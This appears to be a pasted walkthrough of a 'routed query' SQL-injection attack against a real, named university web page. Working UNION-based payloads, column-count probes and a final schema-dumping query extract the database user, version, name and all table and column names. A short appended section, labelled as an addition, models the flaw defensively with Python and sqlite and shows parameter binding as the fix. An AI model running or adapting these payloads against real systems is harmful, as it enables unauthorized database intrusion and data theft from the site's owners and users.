bilasi

Sqli challenge Solution (routed query)

Jun 6th, 2016
SQL Challenge Solution
=========================
url: http://www.che.iitm.ac.in/inner.php?id=6

http://www.che.iitm.ac.in/inner.php?id=6' Union Select 1,2-- -

If you try to balance the query the normal way with ORDER BY or GROUP BY, you will
find 2 columns, and then this error: "The used SELECT statements have a different number of columns"

For this type of error we try methods like:
1. Brute-force the columns
2. Hex-encode all columns
3. Routed query, etc.
4. Or error-based

There is another option to balance the query, like this one:
+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100

Now try it this way to get the column count:
http://www.che.iitm.ac.in/inner.php?id=6' +GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- -
Unknown column '8' in 'group statement'

So there are 7 columns :)

Let's try this:
http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select 1,2,3,4,5,6,7-- -

But we get "The used SELECT statements have a different number of columns" again :3

Now try your own ways to bypass this error:
http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select 111,2222,3333,4444,5555,6666,7777-- -

Does not work.

http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select version(),version(),version(),version(),version(),version(),version()-- -

Also does not work.

You can try other ways, like replacing columns with false or null, or brute force, but that is lengthy.

In this challenge I found something different...
:3

OK, let's try a routed query.

We know that in a routed query every column is replaced by null or hex with a single " ' " or "1' -- -".

http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,0x3227,3,4,5,6,7-- -
:)

Found an error in column no. 2.

http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,"2'-- -",3,4,5,6,7-- -
:)

If you try this, you'll automatically find vulnerable column 4.
:D
Or you can do union-based again in this routed column,
but I said to use UNION SELECT only 1 time.

Now the rest is an easy task.

Thanks .....

My Solution :
=============
http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,"2'-- -",3,CoNcAt(0x496e6a65637465642062792044697075,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(), (select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)), 5,6,7-- -
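
Added example, not part of the original paste: a defender-side model of the "routed" hop, showing why a value returned by one query errors out (2', the decoding of 0x3227) or is silently reinterpreted (2'-- -) when a second query is built by string concatenation, and how binding it as a parameter fixes that. The schema, table and function names are hypothetical, sqlite3 stands in for MySQL, and the rows are constructed sample data.

```python
import sqlite3

def make_db():
    """Constructed sample data; schema and names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(id INTEGER, section TEXT);
        CREATE TABLE articles(section TEXT, title TEXT);
    """)
    # Section values mirror the probes above: 0x3227 decodes to 2'
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "2"), (2, "2'"), (3, "2'-- -")])
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [("2", "public article"), ("2'", "quoted section")])
    return db

def first_query(db, page_id):
    # The entry point is parameterized in both variants; only the second hop differs.
    row = db.execute("SELECT id, section FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[1] if row else None

def second_query_concat(db, page_id):
    """Vulnerable hop: the first query's output is pasted into SQL text."""
    section = first_query(db, page_id)
    sql = "SELECT title FROM articles WHERE section = '" + section + "'"
    try:
        return [r[0] for r in db.execute(sql)]
    except sqlite3.OperationalError as exc:
        return "SQL error: " + str(exc)

def second_query_bound(db, page_id):
    """Hardened hop: the routed value is bound as data, never parsed as SQL."""
    section = first_query(db, page_id)
    rows = db.execute("SELECT title FROM articles WHERE section = ?", (section,))
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    for page_id in (1, 2, 3):
        print(page_id, second_query_concat(db, page_id), second_query_bound(db, page_id))
```

Binding the request parameter alone is not enough: every query that consumes another query's output needs the same treatment, since data read back from the database is still untrusted when it reaches SQL text.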